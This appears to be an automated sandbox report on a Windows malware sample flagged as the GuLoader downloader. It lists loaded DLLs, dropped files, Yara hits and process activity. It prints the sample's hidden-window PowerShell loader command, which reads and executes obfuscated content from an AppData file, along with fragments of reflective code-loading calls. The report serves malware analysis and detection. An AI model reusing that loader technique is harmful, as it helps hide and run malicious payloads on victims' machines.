Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: AwMu7gR48D.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.1860055457.00000000086C3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1855442072.000000000751A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.1860055457.00000000086C3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000002.00000002.1861341380.000000000A4CF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2675534905.0000000004C8F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Agriology $Fradroges $Vaccinen), (Telesatellitterne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:depositumbevises = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Interessekontorets)), $Nervsiteten).DefineDynamicModule($Antiepicentre, $false).DefineType($Dunkes, $Opsparingsformels, [System.Multic

Suspicious powershell command line found

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Kvalitetssansens=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Tagkamrets.Pan';$Elbowy=$Kvalitetssansens.SubString(54196,3);.$Elbowy($Kvalitetssansens)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0758FA57 push esp; iretd		2_2_0758FA63
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0758F01C push ecx; iretd		2_2_0758F01E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe	Jump to dropped file
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File created: C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File created: C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
